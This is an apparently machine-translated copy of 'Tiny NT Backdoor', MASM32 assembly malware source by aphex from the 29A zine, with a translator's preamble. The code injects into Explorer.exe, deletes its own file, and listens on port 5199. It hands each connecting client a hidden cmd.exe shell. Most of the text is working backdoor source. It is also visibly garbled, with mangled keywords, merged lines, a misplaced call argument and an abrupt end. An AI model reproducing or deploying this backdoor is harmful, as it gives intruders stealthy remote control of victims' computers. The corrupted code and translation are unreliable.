Tiny NT Backdoor by aphex; http://www.iamaphex.cjb.net; unremote@knology.net; original 29a # 7 [index-utilities-tiny nt backdoor (aphex)]; translation: icyfox [冰狐 子] / CVC translation team; I don't understand what I have learned because I'm don't understand, in order to support the translation of CVC, I decided to find some things that almost don't have to translate it; I just express the original meaning, not Direct translation; Source code I added a little more comment; I hope everyone will, I am your super helper, work hard, for the small dishes ^ @ ^; start pulling! This program will be inserted in the Explorer.exe process in the Explorer.exe process, and delete itself in the remote thread, thereby do not leave any traces! The inserted thread provides a DOS command (cmd.exe) pipe for each connection, used to execute a command; after disconnect, end the cmd.exe process; the compilation connection command is as follows:; [Translator live: : 0x13140000, that is, change the base, the key, this program is also this! This will not be able to locate it! ]; Linker Options: / base: 0x13140000 / filealign: 0x200 /mege:.data=.text /section: windows / libpath: / masm32 / lib backdoor.obj .386.model flat, stdcalloption caseMap : noneinclude /masm32/include/windows.incinclude /masm32/include/kernel32.incincludelib /masm32/lib/kernel32.libinclude /masm32/include/user32.incincludelib /masm32/lib/user32.libinclude /masm32/include/wsock32.incincludelib /masm32/lib/wsock32.lib .datasztarget Byte 'shell_trayWnd', 0; this is used to get the Explorer.exe process szuser32 byte 'user32.dll', 0; loaded these two DLLSZWinsock byte 'wsock32.dll' in the remote thread 0; it seems that it is not loaded, Explorer.exe itself has loaded SZCommandline Byte 'cmd.exe', 0SzsharedData Byte 261 DUP (0); Save your own path, self-deleted with .DATA? HMODULE DWORD? HNEWMODULE DWORD? HPROCESS DWORD DWSIZE DWORD? DWPID DWORD? DWBYTESWRITEN DWORD DWTID DWORD? WSADATA WSADATA <> .code;
Each connection provides ShellClient conduit ShellClient proc dwSock cmd command is: dwordlocal sat: SECURITY_ATTRIBUTES local hiRead: dwordlocal hoRead: dwordlocal hiWrite: dwordlocal hoWrite: dwordlocal startupinfo: STARTUPINFO local processinfo: PROCESS_INformATION local exitcode: dwordlocal buffer [1024]: byte local bytes: dword local available: dwordlocal data: dword mov sat.nLength, sizeof SECURITY_ATTRIBUTES mov sat.lpSecurityDescriptor, 0 mov sat.bInheritHandle, TRUE; write establish anonymous pipes invoke CreatePipe, addr hiRead, addr hiWrite, addr sat, 0 invoke CreatePipe, addr hoRead, addr hoWrite, addr sat, 0; cmd establishment process utilizes input and output pipes, and for performing feedback invoke GetStartupInfo result of the command, addr startupinfomov startupinfo.cb, sizeof STARTUPINFO mov eax, hoWritemov startupinfo.hStdOutput, eaxmov startupinfo .hStdError, eaxmov eax, hiReadmov startupinfo.hStdInput, eaxmov startupinfo.dwFlags, STARTF_USESHOWWINDOW STARTF_USESTDHANDLES mov startupinfo.wShowWindow, SW_HIDE invoke CreateProcess, 0, addr szCommandLine, 0, 0, TRUE, CREATE_NEW_CONSOLE, 0, 0, addr startupinfo, ad dr processinfo invoke CloseHandle, hoWriteinvoke CloseHandle, hiReadmov bytes, 1invoke ioctlsocket, dwSock, FIONBIO, addr bytes; unblocked mode .while TRUE invoke Sleep, 1; close the connection after the termination of the process cmd invoke GetExitCodeProcess, processinfo.hProcess, addr exitcode. If EXITCODE! = STILL_ACTIVE. BREAK .endif; Read command execution results and send invoke peeknamedpipe, horead, addr buffer, 1024, addr bytes, addr available, 0 .IF BYTES! = 0. IF available> 1024 .While Bytes> = 1024 Invoke Sleep, 1 Invoke Readfile, Horead, Addr Buffer, 1024, Addr Bytes, 0 .if Bytes! = 0 Invoke Send, DWSOCK, AddR Buffer, Bytes, 0.ndif.ndw .else Invoke Readfile, Horead, AddR Buffer, HOREAD, 1024, Addr Bytes, 0 .IF BYTES! =
0 Invoke Send, DWSOCK, AddR Buffer, Bytes, 0.ndif.ndif.endif; accepts commands and writes the pipe to perform invoke recv, dwsock, addr buffer, 1024, 0 .IF EAX == Socket_ERROR || EAX == 0 invoke WSAGetLastError .if eax == WSAEWOULDBLOCK .continue .else invoke TerminateProcess, processinfo.hProcess, 0; if disconnected connection process is ended cmd .break .endif .else mov edx, eax invoke WriteFile, hiWrite, addr buffer, edx, addr BYTES, 0; here you can join Send, so that you can't see the command you entered, you can only see the result; it seems like a scorpion ^ 8 ^ .ndif.Endw; Close the pipeline and connect Invoke Closehandle, Hiwrite Invoke Closehandle , hoRead invoke closesocket, dwSockret ShellClient endp; Shelld inlet Shelld proclocal SockAddrIn remote thread: sockaddr_inlocal dwSock: dwordlocal dwMode: dword invoke DeleteFile, addr szSharedData; self-delete invoke LoadLibrary, addr szUser32; load the DLL, invoke LoadLibrary, addr szWinsock; like unnecessary; initialize and monitor invoke WSAStartup in 5199, 101h, addr WSADatainvoke socket, PF_INET, SOCK_STREAM, 0mov dwSock, eaxmov SockAddrIn.sin_family, AF_INETinvoke htons, 5199mov SockAddrIn.sin_port, axmov SockAddrIn.s in_addr, INADDR_ANYinvoke bind, dwSock, addr SockAddrIn, sizeof SockAddrInmov dwMode, 1invoke ioctlsocket, dwSock, FIONBIO, addr dwModeinvoke listen, dwSock, SOMAXCONN @@: invoke accept, dwSock, addr SockAddrIn, 0.if eax = INVALID_SOCKET mov edx, eax! Establish a process of handling the connected thread, SHELLCLIENT INVOKE CREATTHREAD, 0, 0, AddR ShellClient, EDX, 0, 0 Invoke CloseHandle, Eax.EndifInvoke Sleep, 1000JMP @Bretshelld Endp Start:; Read the base address of its own memory image and size invoke GetModuleHandle, 0mov hModule, eax; where saving base mov edi, eax assume edi: ptr IMAGE_DOS_HEADER add edi, [edi] .e_lfanewadd edi, sizeof dwordadd edi, sizeof IMAGE_FILE_HEADERassume edi: ptr IMAGE_OPTIONAL_HEADER32 mov eax, [edi]. SizeOfimagemov dwsize, EAX;
